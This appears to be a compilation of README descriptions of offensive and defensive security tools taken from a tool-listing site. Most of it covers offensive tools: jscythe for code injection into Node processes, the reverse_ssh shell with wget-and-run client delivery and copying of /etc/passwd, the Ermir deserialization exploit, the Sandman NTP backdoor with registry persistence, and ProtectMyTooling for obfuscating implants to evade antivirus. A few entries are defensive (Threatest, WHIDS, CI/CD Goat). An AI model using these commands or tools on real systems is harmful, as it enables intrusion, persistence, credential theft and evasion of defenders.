jscythe abuses the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code, even if their debugging capabilities are disabled.
Tested and working against Visual Studio Code, Discord, any Node.js application and more!
SIGUSR1
signal to the process, this will enable the debugger on a port (depending on the software, sometimes it's random, sometimes it's not).SIGUSR1
.http://localhost:<port>/json
.Runtime.evaluate
request with the provided code.cargo build --release
Target a specific process and execute a basic expression:
./target/debug/jscythe --pid 666 --code "5 - 3 + 2"
Execute code from a file:
./target/debug/jscythe --pid 666 --script example_script.js
The example_script.js
can require any node module and execute any code, like:
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout
Search process by expression:
./target/debug/jscythe --search extensionHost --script example_script.js
Run jscythe --help
for the complete list of options.
This project is made with ♥ by @evilsocket and it is released under the GPL3 license.
Deliberately vulnerable CI/CD environment. Hack CI/CD pipelines, capture the flags.
Created by Cider Security.
The CI/CD Goat project allows engineers and security practitioners to learn and practice CI/CD security through a set of 10 challenges, enacted against a real, full blown CI/CD environment. The scenarios are of varying difficulty levels, with each scenario focusing on one primary attack vector.
The challenges cover the Top 10 CI/CD Security Risks, including Insufficient Flow Control Mechanisms, PPE (Poisoned Pipeline Execution), Dependency Chain Abuse, PBAC (Pipeline-Based Access Controls), and more.
The different challenges are inspired by Alice in Wonderland, each one is themed as a different character.
The project’s environment is based on Docker images and can be run locally. These images are:
The images are configured to interconnect in a way that creates fully functional pipelines.
There's no need to clone the repository.
curl -o cicd-goat/docker-compose.yaml --create-dirs https://raw.githubusercontent.com/cider-security-research/cicd-goat/main/docker-compose.yaml
cd cicd-goat && docker-compose up -d
mkdir cicd-goat; cd cicd-goat
curl -o docker-compose.yaml https://raw.githubusercontent.com/cider-security-research/cicd-goat/main/docker-compose.yaml
get-content docker-compose.yaml | %{$_ -replace "bridge","nat"}
docker-compose up -d
After starting the containers, it might take up to 5 minutes until the containers configuration process is complete.
Login to CTFd at http://localhost:8000 to view the challenges:
alice
alice
Hack:
alice
alice
thealice
thealice
Insert the flags on CTFd and find out if you got it right.
Warning: Spoilers!
See Solutions.
Clone the repository.
Rename .git folders to make them usable:
python3 rename.py git
Install testing dependencies:
pip3 install pipenv==2022.8.30
pipenv install --deploy
Run the development environment to experiment with new changes:
rm -rf tmp tmp-ctfd/
cp -R ctfd/data/ tmp-ctfd/
docker-compose -f docker-compose-dev.yaml up -d
Make the desired changes:
Shutdown the environment, move changes made in CTFd and rebuild it:
docker-compose -f docker-compose-dev.yaml down
./apply.sh # save CTFd changes
docker-compose -f docker-compose-dev.yaml up -d --build
Run tests:
pytest tests/
Rename .git folders to allow push:
python3 rename.py notgit
Commit and push!
Follow the checklist below to add a challenge:
Want to use SSH for reverse shells? Now you can.
+----------------+ +---------+
| | | |
| | +---------+ RSSH |
| Reverse | | | Client |
| SSH server | | | |
| | | +---------+
+---------+ | | |
| | | | |
| Human | SSH | | SSH | +---------+
| Client +-------->+ <-----------------+ |
| | | | | | RSSH |
+---------+ | | | | Client |
| | | | |
| | | +---------+
| | |
| | |
+----------------+ | +---------+
| | |
| | RSSH |
+---------+ Client |
| |
+---------+
Docker:
docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your_external_address>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v data:/data reversessh/reverse_ssh
Manual:
git clone https://github.com/NHAS/reverse_ssh
cd reverse_ssh
make
cd bin/
# start the server
cp ~/.ssh/id_ed25519.pub authorized_keys
./server 0.0.0.0:3232
# copy client to your target then connect it to the server
./client your.rssh.server.com:3232
# Get help text
ssh your.rssh.server.com -p 3232 help
# See clients
ssh your.rssh.server.com -p 3232 ls -t
Targets
+------------------------------------------+------------+-------------+
| ID | Hostname | IP Address |
+------------------------------------------+------------+-------------+
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |
+------------------------------------------+------------+-------------+
# Connect to full shell
ssh -J your.rssh.server.com:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac
# Or using hostname
ssh -J your.rssh.server.com:3232 root.wombo
NOTE: reverse_ssh requires Go 1.17 or higher. Please check you have at least this version via
go version
The simplest build command is just:
make
Make will build both the client
and server
binaries. It will also generate a private key for the client
, and copy the corresponding public key to the authorized_controllee_keys
file to enable the reverse shell to connect.
Golang allows your to effortlessly cross compile, the following is an example for building windows:
GOOS=windows GOARCH=amd64 make client # will create client.exe
You will need to create an authorized_keys
file much like the ssh http://man.he.net/man5/authorized_keys, this contains your public key. This will allow you to connect to the RSSH server.
Alternatively, you can use the --authorizedkeys flag to point to a file.
cp ~/.ssh/id_ed25519.pub authorized_keys
./server 0.0.0.0:3232 #Set the server to listen on port 3232
Put the client binary on whatever you want to control, then connect to the server.
./client your.rssh.server.com:3232
You can then see what reverse shells have connected to you using ls
:
ssh your.rssh.server.com -p 3232 ls -t
Targets
+------------------------------------------+------------+-------------+
| ID | Hostname | IP Address |
+------------------------------------------+------------+-------------+
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |
+------------------------------------------+------------+-------------+
Then typical ssh commands work, just specify your rssh server as a jump host.
# Connect to full shell
ssh -J your.rssh.server.com:3232 root.wombo
# Run a command without pty
ssh -J your.rssh.server.com:3232 root.wombo help
# Start remote forward
ssh -R 1234:localhost:1234 -J your.rssh.server.com:3232 root.wombo
# Start dynamic forward
ssh -D 9050 -J your.rssh.server.com:3232 root.wombo
# SCP
scp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
#SFTP
sftp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
Specify a default server at build time:
$ RSSH_HOMESERVER=your.rssh.server.com:3232 make
# Will connect to your.rssh.server.com:3232, even though no destination is specified
$ bin/client
# Behaviour is otherwise normal; will connect to the supplied host, e.g example.com:3232
$ bin/client example.com:3232
The RSSH server can also run an HTTP server on the same port as the RSSH server listener which serves client binaries. The server must be placed in the project bin/
folder, as it needs to find the client source.
./server --webserver :3232
# Generate an unnamed link
ssh your.rssh.server.com -p 3232
catcher$ link -h
link [OPTIONS]
Link will compile a client and serve the resulting binary on a link which is returned.
This requires the web server component has been enabled.
-t Set number of minutes link exists for (default is one time use)
-s Set homeserver address, defaults to server --external_address if set, or server listen address if not.
-l List currently active download links
-r Remove download link
--goos Set the target build operating system (default to runtime GOOS)
--goarch Set the target build architecture (default to runtime GOARCH)
--name Set link name
--shared-object Generate shared object file
--fingerprint Set RSSH server fingerprint will default to server public key
--upx Use upx to compress the final binary (requires upx to be installed)
--garble Use ga rble to obfuscate the binary (requires garble to be installed)
# Build a client binary
catcher$ link --name test
http://your.rssh.server.com:3232/test
Then you can download it as follows:
wget http://your.rssh.server.com:3232/test
chmod +x test
./test
You can compile the client as a DLL to be loaded with something like Invoke-ReflectivePEInjection. This will need a cross compiler if you are doing this on linux, use mingw-w64-gcc
.
CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll
When the RSSH server has the webserver enabled you can also compile it with the link command:
./server --webserver :3232
# Generate an unnamed link
ssh your.rssh.server.com -p 3232
catcher$ link --name windows_dll --shared-object --goos windows
http://your.rssh.server.com:3232/windows_dll
Which is useful when you want to do fileless injection of the rssh client.
The SSH ecosystem allowsy out define and call subsystems with the -s
flag. In RSSH this is repurposed to provide special commands for platforms.
list
Lists avaiable subsystemsftp
: Runs the sftp handler to transfer files
setgid
: Attempt to change groupsetuid
: Attempt to change user
service
: Installs or removes the rssh binary as a windows service, requires administrative rights
e.g
# Install the rssh binary as a service (windows only)
ssh -J your.rssh.server.com:3232 test-pc.user.test-pc -s service --install
The client RSSH binary supports being run within a windows service and wont time out after 10 seconds. This is great for creating persistent management services.
Most reverse shells for windows struggle to generate a shell environment that supports resizing, copying and pasting and all the other features that we're all very fond of. This project uses conpty on newer versions of windows, and the winpty library (which self unpacks) on older versions. This should mean that almost all versions of windows will net you a nice shell.
The RSSH server can send out raw HTTP requests set using the webhook
command from the terminal interface.
First enable a webhook:
$ ssh your.rssh.server.com -p 3232
catcher$ webhook --on http://localhost:8080/
Then disconnect, or connect a client, this will when issue a POST
request with the following format.
$ nc -l -p 8080
POST /rssh_webhook HTTP/1.1
Host: localhost:8080
User-Agent: Go-http-client/1.1
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip
{"Status":"connected","ID":"ae92b6535a30566cbae122ebb2a5e754dd58f0ca","IP":"[::1]:52608","HostName":"user.computer","Timestamp":"2022-06-12T12:23:40.626775318+12:00"}%
RSSH and SSH support creating tuntap interfaces that allow you to route traffic and create pseudo-VPN. It does take a bit more setup than just a local or remote forward (-L
, -R
), but in this mode you can send UDP
and ICMP
.
First set up a tun (layer 3) device on your local machine.
sudo ip tuntap add dev tun0 mode tun
sudo ip addr add 172.16.0.1/24 dev tun0
sudo ip link set dev tun0 up
# This will defaultly route all non-local network traffic through the tunnel
sudo ip route add 0.0.0.0/0 via 172.16.0.1 dev tun0
Install a client on a remote machine, this will not work if you have your RSSH client on the same host as your tun device.
ssh -J your.rssh.server.com:3232 user.wombo -w 0:any
This has some limitations, it is only able to send UDP/TCP/ICMP, and not arbitrary layer 3 protocols. ICMP is best effort and may use the remote hosts ping
tool, as ICMP sockets are privileged on most machines. This also does not support tap
devices, e.g layer 2 VPN, as this would require administrative access.
To enable the --garble
flag in the link
command you must install garble, a system for obfuscating golang binaries. However the @latest
release has a bug that causes panics with generic code.
If you are installing this manually use the following:
go install mvdan.cc/garble@f9d9919
Then make sure that the go/bin/
directory is in your $PATH
Unfortunately the golang crypto/ssh
upstream library does not support rsa-sha2-*
algorithms, and work is currently ongoing here:
So until that work is completed, you will have to generate a different (non-rsa) key. I recommend the following:
ssh-keygen -t ed25519
Due to the limitations of SFTP (or rather the library Im using for it). Paths need a little more effort on windows.
sftp -r -J your.rssh.server.com:3232 test-pc.user.test-pc:'/C:/Windows/system32'
Note the /
before the starting character.
By default, clients will run in the background. When started they will execute a new background instance (thus forking a new child process) and then the parent process will exit. If the fork is successful the message "Ending parent" will be printed.
This has one important ramification: once in the background a client will not show any output, including connection failure messages. If you need to debug your client, use the --foreground
flag.
Ermir is an Evil/Rogue RMI Registry, it exploits unsecure deserialization on any Java code calling standard RMI methods on it (list()
/lookup()
/bind()
/rebind()
/unbind()
).
Install Ermir from rubygems.org:
$ gem install ermir
or clone the repo and build the gem:
$ git clone https://github.com/hakivvi/ermir.git
$ rake install
Ermir is a cli gem, it comes with 2 cli files ermir
and gadgetmarshal
, ermir
is the actual gem and the latter is just a pretty interface to GadgetMarshaller.java file which rewrites the gadgets of Ysoserial to match MarshalInputStream
requirements, the output should be then piped into ermir
or a file, in case of custom gadgets use MarshalOutputStream
instead of ObjectOutputStream
to write your serialized object to the output stream.
ermir
usage:
➜ ~ ermir
Ermir by @hakivvi * https://github.com/hakivvi/ermir.
Info:
Ermir is a Rogue/Evil RMI Registry which exploits unsecure Java deserialization on any Java code calling standard RMI methods on it.
Usage: ermir [options]
-l, --listen bind the RMI Registry to this ip and port (default: 0.0.0.0:1099).
-f, --file path to file containing the gadget to be deserialized.
-p, --pipe read the serialized gadget from the standard input stream.
-v, --version print Ermir version.
-h, --help print options help.
Example:
$ gadgetmarshal /path/to/ysoserial.jar Groovy1 calc.exe | ermir --listen 127.0.0.1:1099 --pipe
gadgetmarshal
usage:
➜ ~ gadgetmarshal
Usage: gadgetmarshal /path/to/ysoserial.jar Gadget1 cmd (optional)/path/to/output/file
java.rmi.registry.Registry
offers 5 methods: list()
, lookup()
, bind()
, rebind()
, unbind()
:
public Remote lookup(String name)
: lookup() searches for a bound object in the registry by its name, the registry returns a Remote
object which references the remote object that was looked up, the returned object is read using MarshalInputStream.readObject()
which is just another layer on top of ObjectInputStream
, basically it excpects after each class/proxy descriptor (TC_CLASSDESC
/TC_PROXYCLASSDESC
) an URL that will be used to load this class or proxy class. this is the same wild bug that was fixed in jdk7u21. (Ermir does not specify this URL as only old Java version are vulnerable, instead it just write null). as Ysoserial gadgets are being serialized using ObjectOutputStream
, Ermir uses gadgetmarshal
-a wrapper around GadgetMarshaller.java- to serialize the specified gagdet to match MarshalInputStream
requirements.
public String[] list()
: list() asks the registry for all the bound objects names, while String
type cannot be subsitued with a malicious gadget as it is not like any ordinary object and it is not read using readObject()
but rather readUTF()
, however as list()
returns String[]
which is an actual object and it is read using readObject()
, Ermir sends the gadget instead of this String[]
type.
public void bind(java.lang.String $param_String_1, java.rmi.Remote $param_Remote_2)
: bind() binds an object to a name on the registry, in bind() case the return type is void
and there is nothing being returned, however if the registry specifies in the RMI return data packet that this return is an execptional return, the client/server client will call readObject()
despite the return type is void
, this is how the regitry sends exceptions to its client (usually java.lang.ClassNotFoundException
), once again Ermir will deliver the serialized gadget instead of a legitimate Exception object.
public void rebind(java.lang.String $param_String_1, java.rmi.Remote $param_Remote_2)
: rebind() replaces the binding of the passed name with the supplied remote reference, also returns void
, Ermir returns an exception just like bind().
public void unbind(java.lang.String $param_String_1)
: unbind() unbinds a remote object by name in the RMI registry, this one also returns void
.
Bug reports and pull requests are welcome on GitHub at https://github.com/hakivvi/ermir. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the code of conduct.
The gem is available as open source under the terms of the MIT License.
Everyone interacting in the Ermir project's codebases, issue trackers, chat rooms and mailing lists is expected to follow the code of conduct.
Threatest is a Go framework for testing threat detection end-to-end.
Threatest allows you to detonate an attack technique, and verify that the alert you expect was generated in your favorite security platform.
Read the announcement blog post: https://securitylabs.datadoghq.com/articles/threatest-end-to-end-testing-threat-detection/
A detonator describes how and where an attack technique is executed.
Supported detonators:
An alert matcher is a platform-specific integration that can check if an expected alert was triggered.
Supported alert matchers:
Each detonation is assigned a UUID. This UUID is reflected in the detonation and used to ensure that the matched alert corresponds exactly to this detonation.
The way this is done depends on the detonator; for instance, Stratus Red Team and the AWS Detonator inject it in the user-agent; the SSH detonator uses a parent process containing the UUID.
See examples for complete usage example.
threatest := Threatest()
threatest.Scenario("AWS console login").
WhenDetonating(StratusRedTeamTechnique("aws.initial-access.console-login-without-mfa")).
Expect(DatadogSecuritySignal("AWS Console login without MFA").WithSeverity("medium")).
WithTimeout(15 * time.Minute)
assert.NoError(t, threatest.Run())
ssh, _ := NewSSHCommandExecutor("test-box", "", "")
threatest := Threatest()
threatest.Scenario("curl to metadata service").
WhenDetonating(NewCommandDetonator(ssh, "curl http://169.254.169.254 --connect-timeout 1")).
Expect(DatadogSecuritySignal("EC2 Instance Metadata Service Accessed via Network Utility"))
assert.NoError(t, threatest.Run())
Sandman is a backdoor that is meant to work on hardened networks during red team engagements.
Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.
Since NTP is a protocol that is overlooked by many defenders resulting in wide network accessibility.
Run on windows / *nix machine:
python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).
Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.
IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address).
To start, you can compile the SandmanBackdoor as mentioned below, because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider or just execute/inject it.
To use it, you will need to follow simple steps:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
sc stop w32time
sc start w32time
NOTE: Make sure you are compiling with the x64 option and not any CPU option!
Getting and executing an arbitrary payload from an attacker's controlled server.
Can work on hardened networks since NTP is usually allowed in FW.
Impersonating a legitimate NTP server via IP spoofing.
Python 3.9
The requirements are specified in the requirements file.
To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.
To compile the backdoor I used Visual Studio 2022, you will also need to install DllExport (via Nuget or any other way) to compile it. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.
A shellcode is injected into RuntimeBroker.
Suspicious NTP communication starts with a known magic header.
YARA rule.
Orca for the shellcode.
Special thanks to Tim McGuffin for the time provider idea.
Thanks to those who already contributed and I'll happily accept contributions, make a pull request and I will review it!
EDR with artifact collection driven by detection. The detection engine is built on top of a previous project Gene specially designed to match Windows events against user defined rules.
It means that an alert can directly trigger some artifact collection (file, registry, process memory). This way you are sure you collected the artifacts as soon as you could (near real time).
All this work has been done on my free time in the hope it would help other people, I hope you will enjoy it. Unless I get some funding to further develop this project, I will continue doing so. I will make all I can to fix issues in time and provide updates. Feel free to open issues to improve that project and keep it alive.
NB: the EDR agent can be ran standalone (without being connected to an EDR manager)
NB: event filtering can be done at 100% with Gene rules so do not bother creating a complicated Sysmon configuration.
In order to get the most of WHIDS you might want to improve your logging policy.
Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\System Audit Policies\System\Audit Security System Extension
-> EnableComputer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\System Audit Policies\Object Access\Audit File System
-> EnableSelect a principal
(put here the name of the user/group you want the audit for). Put group Everyone if you want to log access from any user.Apply this to
is used to select the scope of this audit policy starting from the folder you have selectedBasic permissions
select the kinds of accesses you want the logs to be generated forSecurity
log channelMicrosoft-Windows-Windows Defender/Operational
monitored by the EDR.This section covers the installation of the agent on the endpoint.
manage.bat
as administrator
manage.bat
or using your preferred text editormanage.bat
or just reboot (preferred option otherwise some enrichment fields will be incomplete leading to false alerts)NB: At installation time the Sysmon service will be made dependent of WHIDS service so that we are sure the EDR runs before Sysmon starts generating some events.
The EDR manager can be installed on several platforms, pre-built binaries are provided for Windows, Linux and Darwin.
Please visit doc/configuration.md
\\vbox\test
is mounted as Z:
drive, running Z:\whids.exe
won't work while running \\vbox\test\whids.exe
actually would.Github:https://github.com/tines Website:https://www.tines.com/ Twitter:@tines_io
Script that wraps around multitude of packers, protectors, obfuscators, shellcode loaders, encoders, generators to produce complex protected Red Team implants. Your perfect companion in Malware Development CI/CD pipeline, helping watermark your artifacts, collect IOCs, backdoor and more.
ProtectMyToolingGUI.py
With ProtectMyTooling
you can quickly obfuscate your binaries without having to worry about clicking through all the Dialogs, interfaces, menus, creating projects to obfuscate a single binary, clicking through all the options available and wasting time about all that nonsense. It takes you straight to the point - to obfuscate your tool.
Aim is to offer the most convenient interface possible and allow to leverage a daisy-chain of multiple packers combined on a single binary.
That's right - we can launch ProtectMyTooling
with several packers at once:
C:\> py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe
The above example will firstly pass mimikatz.exe
to the Hyperion for obfuscation, and then the result will be provided to UPX for compression. Resulting with UPX(Hyperion(file))
callobf,hyperion,upx
will produce artifact UPX(Hyperion(CallObf(file)))
protected-upload
and protected-execute-assembly
commandsThis tool was designed to work on Windows, as most packers natively target that platform.
Some features may work however on Linux just fine, nonetheless that support is not fully tested, please report bugs and issues.
contrib
directory to exclusions. That directory contains obfuscators, protectors which will get flagged by AV and removed.PS C:\> git clone --recurse https://github.com/Binary-Offensive/ProtectMyTooling
Windows
PS C:\ProtectMyTooling> .\install.ps1
Linux
bash# ./install.sh
For ScareCrow
packer to run on Windows 10, there needs to be WSL
installed and bash.exe
available (in %PATH%
). Then, in WSL one needs to have golang
installed in version at least 1.16
:
cmd> bash
bash$ sudo apt update ; sudo apt upgrade -y ; sudo apt install golang=2:1.18~3 -y
To plug-in supported obfuscators, change default options or point ProtectMyTooling to your obfuscator executable path, you will need to adjust config\ProtectMyTooling.yaml
configuration file.
There is also config\sample-full-config.yaml
file containing all the available options for all the supported packers, serving as reference point.
Before ProtectMyTooling
's first use, it is essential to adjust program's YAML configuration file ProtectMyTooling.yaml
. The order of parameters processal is following:
There, supported packer paths and options shall be set to enable.
Usage is very simple, all it takes is to pass the name of obfuscator to choose, input and output file paths:
C:\> py ProtectMyTooling.py confuserex Rubeus.exe Rubeus-obf.exe
::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;\''';;;;\'\''',;;;'````;;;;;;;;\'\'''
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
. YMMMb :.-:.MM ::-. "YMMMMMP" MMM """"YUMMM"YUMMMMMP" MMM
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;\'''.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88" 888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o
MMM "YMMMMMP" "YMMMMMP"""""YUMMMMM MMM YM `'YMUP"YMM
Red Team implants protection swiss knife.
Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15
[.] Processing x86 file: "\Rubeus.exe"
[.] Generating output of ConfuserEx(<file>)...
[+] SUCCEEDED. Original file size: 417280 bytes, new file size ConfuserEx(<file>): 756224, ratio: 181.23%
One can also obfuscate the file and immediately attempt to launch it (also with supplied optional parameters) to ensure it runs fine with options -r --cmdline CMDLINE
:
Below use case takes beacon.exe
on input and feeds it consecutively into CallObf
-> UPX
-> Hyperion
packers.
Then it will inject specified fooobar
watermark to the final generated output artifact's DOS Stub as well as modify that artifact's checksum with value 0xAABBCCDD
.
Finally, ProtectMyTooling will capture all IOCs (md5, sha1, sha256, imphash, and other metadata) and save them in auxiliary CSV file. That file can be used for IOC matching as engagement unfolds.
PS> py .\ProtectMyTooling.py callobf,upx,hyperion beacon.exe beacon-obf.exe -i -I operation_chimera -w dos-stub=fooobar -w checksum=0xaabbccdd
[...]
[.] Processing x64 file: "beacon.exe"
[>] Generating output of CallObf(<file>)...
[.] Before obfuscation file's PE IMPHASH: 17b461a082950fc6332228572138b80c
[.] After obfuscation file's PE IMPHASH: 378d9692fe91eb54206e98c224a25f43
[>] Generating output of UPX(CallObf(<file>))...
[>] Generating output of Hyperion(UPX(CallObf(<file>)))...
[+] Setting PE checksum to 2864434397 (0xaabbccdd)
[+] Successfully watermarked resulting artifact file.
[+] IOCs written to: beacon-obf-ioc.csv
[+] SUCCEEDED. Original file size: 288256 bytes, new file size Hyperion(UPX(CallObf(<file>))): 175616, ratio: 60.92%
Produced IOCs evidence CSV file will look as follows:
timestamp,filename,author,context,comment,md5,sha1,sha256,imphash
2022-06-10 03:15:52,beacon.exe,mgeeky@commandoVM,Input File,test,dcd6e13754ee753928744e27e98abd16,298de19d4a987d87ac83f5d2d78338121ddb3cb7,0a64768c46831d98c5667d26dc731408a5871accefd38806b2709c66cd9d21e4,17b461a082950fc6332228572138b80c
2022-06-10 03:15:52,y49981l3.bin,mgeeky@commandoVM,Obfuscation artifact: CallObf(<file>),test,50bbce4c3cc928e274ba15bff0795a8c,15bde0d7fbba1841f7433510fa9aa829f8441aeb,e216cd8205f13a5e3c5320ba7fb88a3dbb6f53ee8490aa8b4e1baf2c6684d27b,378d9692fe91eb54206e98c224a25f43
2022-06-10 03:15:53,nyu2rbyx.bin,mgeeky@commandoVM,Obfuscation artifact: UPX(CallObf(<file>)),test,4d3584f10084cded5c6da7a63d42f758,e4966576bdb67e389ab1562e24079ba9bd565d32,97ba4b17c9bd9c12c06c7ac2dc17428d509b64fc8ca9e88ee2de02c36532be10,9aebf3da4677af9275c461261e5abde3
2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Obfuscation artifact: Hyperion(UPX(CallObf(<file>))),te st,8b706ff39dd4c8f2b031c8fa6e3c25f5,c64aad468b1ecadada3557cb3f6371e899d59790,087c6353279eb5cf04715ef096a18f83ef8184aa52bc1d5884e33980028bc365,a46ea633057f9600559d5c6b328bf83d
2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Output obfuscated artifact,test,043318125c60d36e0b745fd38582c0b8,a7717d1c47cbcdf872101bd488e53b8482202f7f,b3cf4311d249d4a981eb17a33c9b89eff656fff239e0d7bb044074018ec00e20,a46ea633057f9600559d5c6b328bf83d
ProtectMyTooling
was designed to support not only Obfuscators/Packers but also all sort of builders/generators/shellcode loaders usable from the command line.
At the moment, program supports various Commercial and Open-Source packers/obfuscators. Those Open-Source ones are bundled within the project. Commercial ones will require user to purchase the product and configure its location in ProtectMyTooling.yaml
file to point the script where to find them.
Amber
- Reflective PE Packer that takes EXE/DLL on input and produces EXE/PIC shellcodeAsStrongAsFuck
- A console obfuscator for .NET assemblies by CharterinoCallObfuscator
- Obfuscates specific windows apis with different apis.ConfuserEx
- Popular .NET obfuscator, forked from Martin Karing
Donut
- Popular PE loader that takes EXE/DLL/.NET on input and produces a PIC shellcodeEnigma
- A powerful system designed for comprehensive protection of executable filesHyperion
- runtime encrypter for 32-bit and 64-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter"IntelliLock
- combines strong license security, highly adaptable licensing functionality/schema with reliable assembly protectionInvObf
- Obfuscates Powershell scripts with Invoke-Obfuscation
(by Daniell Bohannon)LoGiC.NET
- A more advanced free and open .NET obfuscator using dnlib by AnErrupTionMangle
- Takes input EXE/DLL file and produces output one with cloned certificate, removed Golang-specific IoCs and bloated size. By Matt Eidelberg (@Tyl0us).MPRESS
- MPRESS compressor by Vitaly Evseenko. Takes input EXE/DLL/.NET/MAC-DARWIN (x86/x64) and compresses it.NetReactor
- Unmatched .NET code protection system which completely stops anyone from decompiling your codeNetShrink
- an exe packer aka executable compressor, application password protector and virtual DLL binder for Windows & Linux .NET applications.Nimcrypt2
- Generates Nim loader running input .NET, PE or Raw Shellcode. Authored by (@icyguider)
NimPackt-v1
- Takes Shellcode or .NET Executable on input, produces EXE or DLL loader. Brought to you by Cas van Cooten (@chvancooten)
NimSyscallPacker
- Takes PE/Shellcode/.NET executable and generates robust Nim+Syscalls EXE/DLL loader. Sponsorware authored by (@S3cur3Th1sSh1t)
Packer64
- wrapper around John Adams' Packer64
pe2shc
- Converts PE into a shellcode. By yours truly @hasherezade
peCloak
- A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Toolperesed
- Uses "peresed" from avast/pe_tools to remove all existing PE Resources and signature (think of Mimikatz icon).
ScareCrow
- EDR-evasive x64 shellcode loader that produces DLL/CPL/XLL/JScript/HTA artifact loadersgn
- Shikata ga nai (仕方がない) encoder ported into go with several improvements. Takes shellcode, produces encoded shellcodeSmartAssembly
- obfuscator that helps protect your application against reverse-engineering or modification, by making it difficult for a third-party to access your source codesRDI
- Convert DLLs to position independent shellcode. Authored by: Nick Landers, @monoxgas
Themida
- Advanced Windows software protection systemUPX
- a free, portable, extendable, high-performance executable packer for several executable formats.VMProtect
- protects code by executing it on a virtual machine with non-standard architecture that makes it extremely difficult to analyze and crack the softwareYou can quickly list supported packers using -L
option (table columns are chosen depending on Terminal width, the wider the more information revealed):
C:\> py ProtectMyTooling.py -L
[...]
Red Team implants protection swiss knife.
Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| # | Name | Type | Licensing | Input | Output | Author |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| 1 | amber | open-source | Shellcode Loader | PE | EXE, Shellcode | Ege B alci |
| 2 | asstrongasfuck | open-source | .NET Obfuscator | .NET | .NET | Charterino, klezVirus |
| 3 | backdoor | open-source | Shellcode Loader | Shellcode | PE | Mariusz Banach, @mariuszbit |
| 4 | callobf | open-source | PE EXE/DLL Protector | PE | PE | Mustafa Mahmoud, @d35ha |
| 5 | confuserex | open-source | .NET Obfuscator | .NET | .NET | mkaring |
| 6 | donut-packer | open-source | Shellcode Converter | PE, .NET, VBScript, JScript | Shellcode | TheWover |
| 7 | enigma | commercial | PE EXE/DLL Protector | PE | PE | The Enigma Protector Developers Team |
| 8 | hyperion | open-source | PE EXE/DLL Protector | PE | PE | nullsecurity team |
| 9 | intellilock | commercial | .NET Obfuscator | PE | PE | Eziriz |
| 10 | invobf | open-source | Powershell Obfuscator | Powershell | Powershell | Daniel Bohannon |
| 11 | logicnet | open-source | .NET Obfuscator | .NET | .NET | AnErrupTion, klezVirus |
| 12 | mangle | open-source | Executable Signing | PE | PE | Matt Eidelberg (@Tyl0us) |
| 13 | mpress | freeware | PE EXE/DLL Compressor | PE | PE | Vitaly Evseenko |
| 14 | netreactor | commercial | .NET Obfuscator | .NET | .NET | Eziriz |
| 15 | netshrink | open-source | .NET Obfuscator | .NET | .NET | Bartosz Wójcik |
| 16 | nimcrypt2 | open-source | Shellcode Loader | PE, .NET, Shellcode | PE | @icyguider |
| 17 | nimpackt | open-source | Shellcode Loader | .NET, Shellcode | PE | Cas van Cooten (@chvancooten) |
| 18 | nimsyscall | sponsorware | Shellcode Loader | PE, .NET, Shellcode | PE | @S3cur3Th1sSh1t |
| 19 | packer64 | open-source | PE EXE/DLL Compressor | PE | PE | John Adams, @jadams |
